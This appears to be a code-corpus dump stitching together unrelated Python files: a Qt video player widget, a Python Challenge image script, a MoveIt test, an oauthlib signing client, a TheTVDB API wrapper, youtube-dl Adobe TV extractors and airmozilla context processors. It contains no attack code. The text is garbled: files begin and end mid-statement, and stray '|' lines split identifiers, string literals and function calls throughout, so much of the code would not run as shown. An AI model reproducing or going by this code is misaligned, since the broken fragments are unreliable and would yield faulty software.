def frame_back_step(self, *args, **kwargs):
pass
class VideoPlayer(QWidget):
def __init__(self, parent=None, pixlib=None):
super(VideoPlayer, self).__init__(parent)
self.pixlib = pixlib
self.markers = {}
self.video_window = QWidget(self)
self.video_window.setStyleSheet("background-color: #161616;")
if not has_mpv:
self.player = DummyPlayer()
else:
try:
self.player = MPV(
keep_open=True, wid=str(int(self.video_window.winId()))
)
except Exception:
                log_traceback(handlers=False)
self.player = DummyPlayer()
self.position = 0
self.duration = 0
self.mark_in = 0
self.mark_out = 0
        self.fps = 25.0
self.loaded = False
self.duration_changed = False
self.prev_position = 0
self.prev_duration = 0
self.prev_mark_in = 0
self.prev_mark_out = 0
#
# Displays
#
self.mark_in_display = TimecodeWindow(self)
self.mark_in_display.setToolTip("Selection start")
self.mark_in_display.returnPressed.connect(
functools.partial(self.on_mark_in, self.mark_in_display)
)
self.mark_out_display = TimecodeWindow(self)
self.mark_out_display.setToolTip("Selection end")
self.mark_out_display.returnPressed.connect(
functools.partial(self.on_mark_out, self.mark_out_display)
)
self.io_display = TimecodeWindow(self)
self.io_display.setToolTip("Selection duration")
self.io_display.setReadOnly(True)
self.position_display = TimecodeWindow(self)
self.position_display.setToolTip("Clip position")
self.position_display.returnPressed.connect(
functools.partial(self.seek, self.position_display)
)
self.duration_display = TimecodeWindow(self)
self.duration_display.setToolTip("Clip duration")
self.duration_display.setReadOnly(True)
#
# Controls
#
self.timeline = QSlider(Qt.Horizontal)
self.timeline.setRange(0, 0)
self.timeline.sliderMoved.connect(self.on_timeline_seek)
self.region_bar = RegionBar(self)
self.navbar = get_navbar(self)
#
# Layout
#
bottom_bar = QHBoxLayout()
top_bar = QHBoxLayout()
top_bar.addWidget(self.mark_in_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.io_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.mark_out_display, 0)
bottom_bar.addWidget(self.position_display, 0)
bottom_bar.addWidget(self.navbar, 1)
bottom_bar.addWidget(self.duration_display, 0)
layout = QVBoxLayout()
layout.addLayout(top_bar)
layout.addWidget(self.video_window)
layout.addWidget(self.region_bar)
layout.addWidget(self.timeline)
layout.addLayout(bottom_bar)
self.setLayout(layout)
self.navbar.setFocus(True)
@self.player.property_observer("time-pos")
def time_observer(_name, value):
self.on_time_change(value)
@self.player.property_observer("duration")
def duration_observer(_name, value):
self.on_duration_change(value)
@self.player.property_observer("pause")
def pause_observer(_name, value):
self.on_pause_change(value)
# Displays updater
self.display_timer = QTimer()
self.display_timer.timeout.connect(self.on_display_timer)
self.display_timer.start(40)
@property
def frame_dur(self):
return 1 / self.fps
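    # Illustrative note (not in the original source): with the default
    # self.fps of 25.0 this is 0.04 s, i.e. one 40 ms tick of display_timer.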
def load(self, path, mark_in=0, mark_out=0, markers={}):
self.loaded = False
self.markers = markers
self.player["pause"] = True
self.player.play(path)
self.prev_mark_in = -1
self.prev_mark_out = -1
self.mark_in = mark_in
self.mark_out = mark_out
self.mark_in_display.set_value(0)
self.mark_out_display.set_value(0)
self.duration_display.set_value(0)
self.position_display.set_value(0)
def on_time_change(self, value):
self.position = value
def on_duration_change(self, value):
if value:
self.duration = value
self.loaded = True
else:
self.duration = 0
self.loaded = False
self.duration_changed = True
self.region_bar.update()
def on_pause_change(self, value):
if hasattr(self, "action_play"):
self.action_play.setIcon(QIcon(self.pixlib[["pause", "play"][int(value)]]))
def on_timeline_seek(self):
if not self.loaded:
return
try:
self.player["pause"] = True
self.player.seek(self.timeline.value() / 100.0, "absolute", "exact")
except Exception:
pass
def on_frame_next(self):
if not self.loaded:
return
self.player.frame_step()
def on_frame_prev(self):
if not self.loaded:
return
self.player.frame_back_step()
def on_5_next(self):
if not self.loaded:
return
self.player.seek(5 * self.frame_dur, "relative", "exact")
def on_5_prev(self):
if not self.loaded:
return
self.player.seek(-5 * self.frame_dur, "relative", "exact")
def on_go_start(self):
if not self.loaded:
return
self.player.seek(0, "absolute", "exact")
def on_go_end(self):
if not self.loaded:
return
self.player.seek(self.duration, "absolute", "exact")
def on_go_in(self):
if not self.loaded:
return
self.seek(self.mark_in)
def on_go_out(self):
if not self.loaded:
return
self.seek(self.mark_out or self.duration)
def on_mark_in(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_in = value
self.setFocus()
else:
self.mark_in = self.position
self.region_bar.update()
def on_mark_out(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_out = value
self.setFocus()
else:
self.mark_out = self.position
self.region_bar.update()
def on_clear_in(self):
if not self.loaded:
return
self.mark_in = 0
self.region_bar.update()
def on_clear_out(self):
if not self.loaded:
return
self.mark_out = 0
self.region_bar.update()
def on_clear_marks(self):
if not self.loaded:
return
self.mark_out = self.mark_in = 0
self.region_bar.update()
def seek(self, position):
if not self.loaded:
return
if isinstance(position, TimecodeWind
|
tdl/python-challenge
|
l12_imageEvilReal.py
|
Python
|
mit
| 3,202
| 0.010618
|
## image quickie!
## install PIL (Python Imaging Library) first. Supercool lib
import Image ## from PIL !
fImageOrig = "C:\\evil1.jpg"
im = Image.open(fImageOrig)
print im.size, im.mode
width, height = im.size
## get pixel list
lpix = list(im.getdata())
def getEvenOdd(lpix, width, height):
return getPixels(lpix, width, height, 0)
def getOddEven(lpix, width, height):
return getPixels(lpix, width, height, 1)
def getPixels(lpix, width, height, baseoffset):
thelist = []
for i in range(height):
offset = baseoffset
if (i % 6 in [3,4,5]):
offset = 1 - baseoffset
## get all "even" pixels on rows like 0,1,2, and all
## "odd" pixels on rows like 3,4,5
thelist.extend(lpix[offset + width*i : offset + width*i + width : 2])
return thelist
##l0 = getEvenOdd(lpix, width, height)
##l1 = getOddEven(lpix, width, height)
l0 = lpix[::2]
l1 = lpix[1::2]
im0 = Image.new(im.mode, (width/2, height))
im0.putdata(l0)
im0.save("c:\\ev0.jpg")
im1 = Image.new(im.mode, (width/2, height))
im1.putdata(l1)
im1.save("c:\\ev1.jpg")
def getAnXthPartHeight(lpix, width, height, startline, x=6):
l = []
print width, height, startline
for i in range(startline, height, x):
l.extend(lpix[i*width : (i+1)*width])
return l
def getAnXthPartWidth(lpix, width, height, startcol, x=8):
    print width, height, startcol
return lpix[startcol::x]
magicheight = 5
listsEven = range(magicheight)
imagesEven = range(magicheight)
for i in range(magicheight):
listsEven[i] = getAnXthPartHeight(l0, width/2, height, i, magicheight)
imagesEven[i] = Image.new(im.mode, (width/2, height/magicheight))
imagesEven[i].putdata(listsEven[i])
imagesEven[i].save("c:\\evil_even_" + str(magicheight) + "_" + str(i) + ".jpg")
listsOdd = range(magicheight)
imagesOdd = range(magicheight)
for i in range(magicheight):
listsOdd[i] = getAnXthPartHeight(l1, width/2, height, i, magicheight)
imagesOdd[i] = Image.new(im.mode, (width/2, height/magicheight))
imagesOdd[i].putdata(listsOdd[i])
imagesOdd[i].save("c:\\evil_odd_" + str(magicheight) + "_" + str(i) + ".jpg")
magicwidth = 4
for j in range(magicheight):
listsEvenJ = range(magicwidth)
imagesEvenJ = range(magicwidth)
for i in range(magicwidth):
listsEvenJ[i] = getAnXthPartWidth(listsEven[j], width/2, height, i, magicwidth)
imagesEvenJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
imagesEvenJ[i].putdata(listsEvenJ[i])
imagesEvenJ[i].save("c:\\evil_even_" + str(magicheight) + "_" + \
str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
for j in range(magicheight):
listsOddJ = range(magicwidth)
imagesOddJ = range(magicwidth)
for i in range(magicwidth):
listsOddJ[i] = getAnXthPartWidth(listsOdd[j], width/2, height, i, magicwidth)
imagesOddJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
imagesOddJ[i].putdata(listsOddJ[i])
imagesOddJ[i].save("c:\\evil_odd_" + str(magicheight) + "_" + \
str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
|
GeoMop/GeoMop
|
src/ModelEditor/ui/panels/__init__.py
|
Python
|
gpl-3.0
| 218
| 0
|
"""
Module with Qt widgets.
"""
from .debug_info import DebugPanelWidget
from .error_tab import ErrorWidget
from .info_panel import InfoPanelPage
from .tree import TreeWidget
from .yaml_editor import YamlEditorWidget
|
davetcoleman/moveit
|
moveit_ros/planning_interface/test/python_move_group_ns.py
|
Python
|
bsd-3-clause
| 3,928
| 0.001527
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#  * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: William Baker
#
# This test is used to ensure planning with a MoveGroupInterface is
# possible if the robot's move_group node is in a different namespace
import unittest
import numpy as np
import rospy
import rostest
import os
from moveit_ros_planning_interface._moveit_move_group_interface import MoveGroupInterface
class PythonMoveGroupNsTest(unittest.TestCase):
PLANNING_GROUP = "manipulator"
PLANNING_NS = "test_ns/"
@classmethod
def setUpClass(self):
self.group = MoveGroupInterface(self.PLANNING_GROUP, "%srobot_description"%self.PLANNING_NS, self.PLANNING_NS)
@classmethod
def tearDown(self):
pass
def check_target_setting(self, expect, *args):
if len(args) == 0:
args = [expect]
self.group.set_joint_value_target(*args)
res = self.group.get_joint_value_target()
self.assertTrue(np.all(np.asarray(res) == np.asarray(expect)),
"Setting failed for %s, values: %s" % (type(args[0]), res))
def test_target_setting(self):
n = self.group.get_variable_count()
self.check_target_setting([0.1] * n)
self.check_target_setting((0.2,) * n)
self.check_target_setting(np.zeros(n))
self.check_target_setting([0.3] * n, {name: 0.3 for name in self.group.get_active_joints()})
self.check_target_setting([0.5] + [0.3]*(n-1), "joint_1", 0.5)
def plan(self, target):
self.group.set_joint_value_target(target)
return self.group.compute_plan()
def test_validation(self):
current = np.asarray(self.group.get_current_joint_values())
plan1 = self.plan(current + 0.2)
plan2 = self.plan(current + 0.2)
# first plan should execute
self.assertTrue(self.group.execute(plan1))
# second plan should be invalid now (due to modified start point) and rejected
self.assertFalse(self.group.execute(plan2))
# newly planned trajectory should execute again
plan3 = self.plan(current)
self.assertTrue(self.group.execute(plan3))
if __name__ == '__main__':
PKGNAME = 'moveit_ros_planning_interface'
NODENAME = 'moveit_test_python_move_group'
rospy.init_node(NODENAME)
rostest.rosrun(PKGNAME, NODENAME, PythonMoveGroupNsTest)
|
mozilla/firefox-flicks
|
vendor-local/lib/python/oauthlib/oauth1/rfc5849/__init__.py
|
Python
|
bsd-3-clause
| 41,842
| 0.001793
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
"""
oauthlib.oauth1.rfc5849
~~~~~~~~~~~~~~
This module is an implementation of various logic needed
for signing and checking OAuth 1.0 RFC 5849 requests.
"""
import logging
import sys
import time
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
if sys.version_info[0] == 3:
bytes_type = bytes
else:
bytes_type = str
from oauthlib.common import Request, urlencode, generate_nonce
from oauthlib.common import generate_timestamp, to_unicode
from . import parameters, signature, utils
SIGNATURE_HMAC = "HMAC-SHA1"
SIGNATURE_RSA = "RSA-SHA1"
SIGNATURE_PLAINTEXT = "PLAINTEXT"
SIGNATURE_METHODS = (SIGNATURE_HMAC, SIGNATURE_RSA, SIGNATURE_PLAINTEXT)
SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER'
SIGNATURE_TYPE_QUERY = 'QUERY'
SIGNATURE_TYPE_BODY = 'BODY'
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
class Client(object):
"""A client used to sign OAuth 1.0 RFC 5849 requests"""
def __init__(self, client_key,
client_secret=None,
resource_owner_key=None,
resource_owner_secret=None,
callback_uri=None,
signature_method=SIGNATURE_HMAC,
signature_type=SIGNATURE_TYPE_AUTH_HEADER,
rsa_key=None, verifier=None, realm=None,
encoding='utf-8', nonce=None, timestamp=None):
# Convert to unicode using encoding if given, else assume unicode
encode = lambda x: to_unicode(x, encoding) if encoding else x
self.client_key = encode(client_key)
self.client_secret = encode(client_secret)
self.resource_owner_key = encode(resource_owner_key)
self.resource_owner_secret = encode(resource_owner_secret)
self.signature_method = encode(signature_method)
self.signature_type = encode(signature_type)
self.callback_uri = encode(callback_uri)
self.rsa_key = encode(rsa_key)
self.verifier = encode(verifier)
self.realm = encode(realm)
self.encoding = encode(encoding)
self.nonce = encode(nonce)
self.timestamp = encode(timestamp)
if self.signature_method == SIGNATURE_RSA and self.rsa_key is None:
raise ValueError('rsa_key is required when using RSA signature method.')
def get_oauth_signature(self, request):
"""Get an OAuth signature to be used in signing a request
"""
if self.signature_method == SIGNATURE_PLAINTEXT:
# fast-path
return signature.sign_plaintext(self.client_secret,
self.resource_owner_secret)
uri, headers, body = self._render(request)
collected_params = signature.collect_parameters(
uri_query=urlparse.urlparse(uri).query,
body=body,
headers=headers)
logging.debug("Collected params: {0}".format(collected_params))
normalized_params = signature.normalize_parameters(collected_params)
normalized_uri = signature.normalize_base_string_uri(request.uri)
logging.debug("Normalized params: {0}".format(normalized_params))
logging.debug("Normalized URI: {0}".format(normalized_uri))
base_string = signature.construct_base_string(request.http_method,
normalized_uri, normalized_params)
logging.debug("Base signing string: {0}".format(base_string))
        if self.signature_method == SIGNATURE_HMAC:
sig = signature.sign_hmac_sha1(base_string, self.client_secret,
self.resource_owner_secret)
elif self.signature_method == SIGNATURE_RSA:
sig = signature.sign_rsa_sha1(base_string, self.rsa_key)
else:
            sig = signature.sign_plaintext(self.client_secret,
                self.resource_owner_secret)
logging.debug("Signature: {0}".format(sig))
return sig
def get_oauth_params(self):
"""Get the basic OAuth parameters to be used in generating a signature.
"""
nonce = (generate_nonce()
if self.nonce is None else self.nonce)
timestamp = (generate_timestamp()
if self.timestamp is None else self.timestamp)
params = [
('oauth_nonce', nonce),
('oauth_timestamp', timestamp),
('oauth_version', '1.0'),
('oauth_signature_method', self.signature_method),
('oauth_consumer_key', self.client_key),
]
if self.resource_owner_key:
params.append(('oauth_token', self.resource_owner_key))
if self.callback_uri:
params.append(('oauth_callback', self.callback_uri))
if self.verifier:
params.append(('oauth_verifier', self.verifier))
return params
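    # Illustrative usage (not part of the original module), via the sign()
    # method defined below:
    #   client = Client(u'client-key', client_secret=u'client-secret')
    #   uri, headers, body = client.sign(u'https://api.example.com/resource')
    # With the default AUTH_HEADER signature type the computed oauth_*
    # parameters end up in the Authorization header.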
def _render(self, request, formencode=False, realm=None):
"""Render a signed request according to signature type
Returns a 3-tuple containing the request URI, headers, and body.
If the formencode argument is True and the body contains parameters, it
is escaped and returned as a valid formencoded string.
"""
# TODO what if there are body params on a header-type auth?
# TODO what if there are query params on a body-type auth?
uri, headers, body = request.uri, request.headers, request.body
# TODO: right now these prepare_* methods are very narrow in scope--they
# only affect their little thing. In some cases (for example, with
# header auth) it might be advantageous to allow these methods to touch
# other parts of the request, like the headers—so the prepare_headers
# method could also set the Content-Type header to x-www-form-urlencoded
# like the spec requires. This would be a fundamental change though, and
# I'm not sure how I feel about it.
if self.signature_type == SIGNATURE_TYPE_AUTH_HEADER:
headers = parameters.prepare_headers(request.oauth_params, request.headers, realm=realm)
elif self.signature_type == SIGNATURE_TYPE_BODY and request.decoded_body is not None:
body = parameters.prepare_form_encoded_body(request.oauth_params, request.decoded_body)
if formencode:
body = urlencode(body)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
elif self.signature_type == SIGNATURE_TYPE_QUERY:
uri = parameters.prepare_request_uri_query(request.oauth_params, request.uri)
else:
raise ValueError('Unknown signature type specified.')
return uri, headers, body
def sign(self, uri, http_method='GET', body=None, headers=None, realm=None):
"""Sign a request
Signs an HTTP request with the specified parts.
Returns a 3-tuple of the signed request's URI, headers, and body.
Note that http_method is not returned as it is unaffected by the OAuth
signing process.
The body argument may be a dict, a list of 2-tuples, or a formencoded
string. The Content-Type header must be 'application/x-www-form-urlencoded'
if it is present.
If the body argument is not one of the above, it will be returned
verbatim as it is unaffected by the OAuth signing process. Attempting to
sign a request with non-formencoded data using the OAuth body signature
type is invalid and will raise an exception.
If the body does contain parameters, it will be returned as a properly-
formatted formencoded string.
All string data MUST be unicode. This includes strings inside body
dicts, for example.
"""
# normalize request data
request = Request(uri, http_method, body, headers,
encoding=self.encoding)
# sanity check
content_type = request.headers.get('Content-Type', None)
multipart = content_type and content_type.startswith('multipart/')
should_have_params = content_type == CONTENT_TYPE_FORM_URLENCODED
has_params = request.decoded_body is not None
        # 3.4.1.3.1. Parameter Sources
|
axlt2002/script.light.imdb.ratings.update
|
resources/support/tvdbsimple/base.py
|
Python
|
gpl-3.0
| 5,912
| 0.007781
|
# -*- coding: utf-8 -*-
"""
This module implements the base class of tvdbsimple.
Handle automatically login, token creation and response basic stripping.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
import json
import requests
class AuthenticationError(Exception):
"""
Authentication exception class for authentication errors
"""
pass
class APIKeyError(Exception):
"""
Missing API key exception class in case of missing api
"""
pass
class TVDB(object):
"""
Basic Authentication class for API key, login and token automatic handling functionality.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
_headers = {'Content-Type': 'application/json',
'Accept': 'application/json',
'Connection': 'close'}
_BASE_PATH = ''
_URLS = {}
_BASE_URI = 'https://api.thetvdb.com'
def __init__(self, id=0, user=None, key=None):
"""
Initialize the base class.
        You can provide `id`, the item id used for url creation. You can also
        provide `user`, the username used for login, and `key`, the userkey
        needed to authenticate the user; you can find it in the
        [account info](http://thetvdb.com/?tab=userinfo) under account identifier.
"""
self._ID = id
self.USER = user
"""Stores username if available"""
self.USER_KEY = key
"""Stores user-key if available"""
def _get_path(self, key):
return self._BASE_PATH + self._URLS[key]
def _get_id_path(self, key):
return self._get_path(key).format(id=self._ID)
def _get_complete_url(self, path):
return '{base_uri}/{path}'.format(base_uri=self._BASE_URI, path=path)
def _set_language(self, language):
if language:
self._headers['Accept-Language'] = language
def refresh_token(self):
"""
Refresh the current token set in the module.
Returns the new obtained valid token for the API.
"""
self._set_token_header()
response = requests.request(
|
'GET', self._get_complete_url('refresh_token'),
headers=self._headers)
response.raise_for_status()
jsn = response.json()
if 'token' in jsn:
from . import KEYS
KEYS.API_TOKEN = jsn['token']
return KEYS.API_TOKEN
return ''
def _set_token_header(self, forceNew=False):
self._headers['Authorization'] = 'Bearer ' + self.get_token(forceNew)
def get_token(self, forceNew=False):
|
"""
        Get the existing token, or create it if it doesn't exist.
Returns the API token.
If `forceNew` is true the function will do a new login to retrieve the token.
"""
from . import KEYS
if not KEYS.API_TOKEN or forceNew:
if not KEYS.API_KEY:
raise APIKeyError
if hasattr(self,"USER") and hasattr(self,"USER_KEY"):
data = {"apikey": KEYS.API_KEY, "username": self.USER, "userkey": self.USER_KEY}
else:
data={"apikey": KEYS.API_KEY}
response = requests.request(
'POST', self._get_complete_url('login'),
data=json.dumps(data),
headers=self._headers)
if response.status_code == 200:
KEYS.API_TOKEN = response.json()['token']
else:
error = "Unknown error while authenticating. Check your api key or your user/userkey"
try:
error = response.json()['error']
                except Exception:
pass
raise AuthenticationError(error)
return KEYS.API_TOKEN
def _request(self, method, path, params=None, payload=None, forceNewToken=False, cleanJson = True):
self._set_token_header(forceNewToken)
url = self._get_complete_url(path)
response = requests.request(
method, url, params=params,
data=json.dumps(payload) if payload else payload,
headers=self._headers)
if response.status_code == 200:
response.encoding = 'utf-8'
jsn = response.json()
if cleanJson and 'data' in jsn:
return jsn['data']
return jsn
elif not forceNewToken:
return self._request(method=method, path=path, params=params, payload=payload, forceNewToken=True)
        # Surface the API-provided error message if present; otherwise fall
        # back to raising on the HTTP status code.
        try:
            error = response.json()['error']
        except (ValueError, KeyError):
            response.raise_for_status()
        else:
            raise Exception(error)
def _GET(self, path, params=None, cleanJson = True):
return self._request('GET', path, params=params, cleanJson=cleanJson)
def _POST(self, path, params=None, payload=None, cleanJson = True):
return self._request('POST', path, params=params, payload=payload, cleanJson=cleanJson)
def _DELETE(self, path, params=None, payload=None, cleanJson = True):
return self._request('DELETE', path, params=params, payload=payload, cleanJson=cleanJson)
def _PUT(self, path, params=None, payload=None, cleanJson = True):
return self._request('PUT', path, params=params, payload=payload, cleanJson=cleanJson)
def _set_attrs_to_values(self, response={}):
"""
Set attributes to dictionary values.
- e.g.
>>> import tvdbsimple as tvdb
        >>> show = tvdb.Series(10332)
        >>> response = show.info()
        >>> show.seriesName # instead of response['seriesName']
"""
if isinstance(response, dict):
for key in response:
setattr(self, key, response[key])
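# A minimal usage sketch of the class above (hypothetical API key; KEYS is the
# module-level store referenced in get_token):
#
#   >>> import tvdbsimple as tvdb
#   >>> tvdb.KEYS.API_KEY = 'YOUR_API_KEY'
#   >>> from tvdbsimple.base import TVDB
#   >>> base = TVDB()
#   >>> base.get_token()       # logs in and caches the JWT in KEYS.API_TOKEN
#   >>> base.refresh_token()   # renews the cached token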
|
navin-bhaskar/NewsReader-on-Linkit7688
|
config.py
|
Python
|
bsd-2-clause
| 522
| 0.017241
|
# The audio card number to be used; use "aplay -l" output to determine the card number
AUDIO_CARD_NUMBER = 1
# Define the IR/button input pin
INP_PIN = 2
# Speed with which the converted text is to be spoken
|
TTS_SPEED = 70
# Whether the config server is to be spawned or not; set to False if you do not want the config server
CONFIG_SERVER_SPAWN = True
# Name of the file where the RSS links will be stored
R
|
SS_LINKS_FILE = "links.txt"
# A temp file to indicate that the RSS list has been updated
NEW_LIST_FILE = ".changed.tmp"
|
apllicationCOM/youtube-dl-api-server
|
youtube_dl_server/youtube_dl/extractor/adobetv.py
|
Python
|
unlicense
| 4,630
| 0.001728
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
parse_duration,
unified_strdate,
str_to_int,
float_or_none,
ISO639Utils,
)
class AdobeTVIE(InfoExtractor):
_VALID_URL = r'https?://tv\.adobe\.com/watch/[^/]+/(?P<id>[^/]+)'
_TEST = {
'url': 'http://tv.adobe.com/watch/the-complete-picture-with-julieanne-kost/quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop/',
'md5': '9bc5727bcdd55251f35ad311ca74fa1e',
'info_dict': {
'id': 'quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop',
'ext': 'mp4',
'title': 'Quick Tip - How to Draw a Circle Around an Object in Photoshop',
'description': 'md5:99ec318dc909d7ba2a1f2b038f7d2311',
'thumbnail': 're:https?://.*\.jpg$',
'upload_date': '20110914',
'duration': 60,
'view_count': int,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player = self._parse_json(
self._search_regex(r'html5player:\s*({.+?})\s*\n', webpage, 'player'),
video_id)
title = player.get('title') or self._search_regex(
r'data-title="([^"]+)"', webpage, 'title')
description = self._og_search_description(webpage)
thumbnail = self._og_search_thumbnail(webpage)
upload_date = unified_strdate(
self._html_search_meta('datepublished', webpage, 'upload date'))
duration = parse_duration(
self._html_search_meta('duration', webpage, 'duration') or
self._search_regex(
r'Runtime:\s*(\d{2}:\d{2}:\d{2})',
webpage, 'duration', fatal=False))
view_count = str_to_int(self._search_regex(
r'<div class="views">\s*Views?:\s*([\d,.]+)\s*</div>',
webpage, 'view count'))
formats = [{
'url': source['src'],
'format_id': source.get('quality') or source['src'].split('-')[-1].split('.')[0] or None,
'tbr': source.get('bitrate'),
} for source in player['sources']]
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'duration': duration,
'view_count': view_count,
'formats': formats,
}
class AdobeTVVideoIE(InfoExtractor):
_VALID_URL = r'https?://video\.tv\.adobe\.com/v/(?P<id>\d+)'
|
_TEST = {
# From https://helpx.adobe.com/acrobat/how-to/new-experience-acrobat-dc.html?set=acrobat--get-started--essential-beginners
'url': 'https://video.tv.adobe.com/v/2456/',
'md5': '43662b577c018ad707a63766462b1e87',
'info_dict': {
'id': '24
|
56',
'ext': 'mp4',
'title': 'New experience with Acrobat DC',
'description': 'New experience with Acrobat DC',
'duration': 248.667,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player_params = self._parse_json(self._search_regex(
r'var\s+bridge\s*=\s*([^;]+);', webpage, 'player parameters'),
video_id)
formats = [{
'url': source['src'],
'width': source.get('width'),
'height': source.get('height'),
'tbr': source.get('bitrate'),
} for source in player_params['sources']]
# For both metadata and downloaded files the duration varies among
# formats. I just pick the max one
duration = max(filter(None, [
float_or_none(source.get('duration'), scale=1000)
for source in player_params['sources']]))
subtitles = {}
for translation in player_params.get('translations', []):
lang_id = translation.get('language_w3c') or ISO639Utils.long2short(translation['language_medium'])
if lang_id not in subtitles:
subtitles[lang_id] = []
subtitles[lang_id].append({
'url': translation['vttPath'],
'ext': 'vtt',
})
return {
'id': video_id,
'formats': formats,
'title': player_params['title'],
'description': self._og_search_description(webpage),
'duration': duration,
'subtitles': subtitles,
}
|
lcamacho/airmozilla
|
airmozilla/main/context_processors.py
|
Python
|
bsd-3-clause
| 12,078
| 0
|
import datetime
from django.conf import settings
from django.db.models import Q
from django.utils import timezone
from django.core.cache import cache
from funfactory.urlresolvers import reverse
from airmozilla.main.models import (
Event,
Channel,
EventHitStats,
most_recent_event
)
from airmozilla.main.views import is_contributor
from airmozilla.search.forms import SearchForm
from airmozilla.staticpages.models import StaticPage
def nav_bar(request):
def get_nav_bar():
items = [
('Home', reverse('main:home'), 'home', ''),
('About', '/about/', '/about', ''),
('Channels', reverse('main:channels'), 'channels', ''),
('Calendar', reverse('main:calendar'), 'calendar', ''),
]
if not request.user.is_staff:
items.append(
('Tag Cloud', reverse('main:tag_cloud'), 'tag_cloud', '')
)
items.append(
('Starred', reverse('starred:home'), 'starred', '')
)
unfinished_events = 0
if request.user.is_active:
unfinished_events = Event.objects.filter(
creator=request.user,
status=Event.STATUS_INITIATED,
upload__isnull=False,
).count()
if settings.USE_NEW_UPLOADER:
items.append(
('New/Upload', reverse('new:home'), 'new', ''),
)
else:
items.append(
('Requests', reverse('suggest:start'), 'suggest', ''),
)
if request.user.is_staff:
items.append(
('Management', reverse('manage:events'), '', ''),
)
if not settings.BROWSERID_DISABLED:
items.append(
('Sign out', '/browserid/logout/', '', 'browserid-logout'),
)
return {'items': items, 'unfinished_events': unfinished_events}
# The reason for making this a closure is because this stuff is not
# needed on every single template render. Only the main pages where
# there is a nav bar at all.
return {'nav_bar': get_nav_bar}
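# Sketch of the deferred evaluation above (hypothetical direct call; normally
# a template triggers it):
#
#   context = nav_bar(request)
#   items = context['nav_bar']()['items']   # DB queries happen only here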
def dev(request):
return {
'DEV': settings.DEV,
'DEBUG': settings.DEBUG,
'BROWSERID_DISABLED': settings.BROWSERID_DISABLED,
}
def search_form(request):
return {'search_form': SearchForm(request.GET)}
def base(request):
def get_feed_data():
feed_privacy = _get_feed_privacy(request.user)
if getattr(request, 'channels', None):
channels = request.channels
else:
channels = Channel.objects.filter(
slug=settings.DEFAULT_CHANNEL_SLUG
)
if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
title = 'Air Mozilla RSS'
url = reverse('main:feed', args=(feed_privacy,))
else:
_channel = channels[0]
title = 'Air Mozilla - %s - RSS' % _channel.name
url = reverse(
'main:channel_feed',
args=(_channel.slug, feed_privacy)
)
return {
'title': title,
'url': url,
}
return {
|
# used for things like {% if event.attr == Event.ATTR1 %}
'Event': Event,
'get_feed_data': get_feed_data,
}
def sidebar(request):
#
|
none of this is relevant if you're in certain URLs
def get_sidebar():
data = {}
if not getattr(request, 'show_sidebar', True):
return data
# if viewing a specific page is limited by channel, apply that
# filtering here too
if getattr(request, 'channels', None):
channels = request.channels
else:
channels = Channel.objects.filter(
slug=settings.DEFAULT_CHANNEL_SLUG
)
if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
sidebar_channel = settings.DEFAULT_CHANNEL_SLUG
else:
_channel = channels[0]
sidebar_channel = _channel.slug
data['upcoming'] = get_upcoming_events(channels, request.user)
data['featured'] = get_featured_events(channels, request.user)
data['sidebar_top'] = None
data['sidebar_bottom'] = None
sidebar_urls_q = (
Q(url='sidebar_top_%s' % sidebar_channel) |
Q(url='sidebar_bottom_%s' % sidebar_channel) |
Q(url='sidebar_top_*') |
Q(url='sidebar_bottom_*')
)
